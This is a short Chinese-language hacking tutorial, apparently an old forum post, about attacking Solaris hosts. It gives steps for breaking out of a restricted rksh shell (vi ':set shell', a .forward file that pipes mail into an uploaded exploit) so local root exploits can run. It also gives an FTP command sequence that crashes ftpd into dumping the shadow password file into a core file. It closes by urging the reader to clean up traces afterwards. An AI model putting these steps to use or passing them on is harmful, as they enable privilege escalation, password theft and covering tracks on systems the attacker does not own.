如何在Solaris操作系统获取Shadow

有的root怕local用户运行buffer overflow的exploit程序取得

　　root权限, 就给local用户用rksh. 用了该shell之后,用户只能

　　运行指定目录的命令, 而不能运行home目录下的exploit程序.

　　要突破这个限制有几个方法:

　　1. 如果能运行vi命令,则:set shell=/bin/sh, 假设/bin/sh可以

　　让other运行. 然后:shell即可得到不受限制的shell.

　　2. 如果没有vi命令,或vi命令不能:set shell, 可

　　先在home目录放个你想运行的命令(exploit, or other), 可以

　　用chmod命令设成可执行. 如果没有chmod命令,可以用rcp从别的

　　机器拷进去. 还可tar起来ftp上去,再untar开. 然后在home目录

　　下建个.forward文件,其内容为"| /path/to/your/command", 注

　　意引号是需要的. 这时给你的account发个email就可运行该命令.

　　B:

　　如何获取 Shadow 口令文件

　　该方法利用了Solaris 操作系统中FTPD的一个BUG，使得用户可以获得

　　该机的口令文件。具体过程如下：

　　1.通过 ftp 正常登录到目的主机上

　　2.输入如下命令序列：

　　ftp$#@62; user root wrongpasswd

　　ftp$#@62; quote pasv

　　3.这时，ftpd会报错退出，同时会在当前目录下生成一个core，口令

　　文件就包含在这个core中。

　　嘿嘿.. 下一步就不用我说了吧，不过临走时要记得清理好战场哟。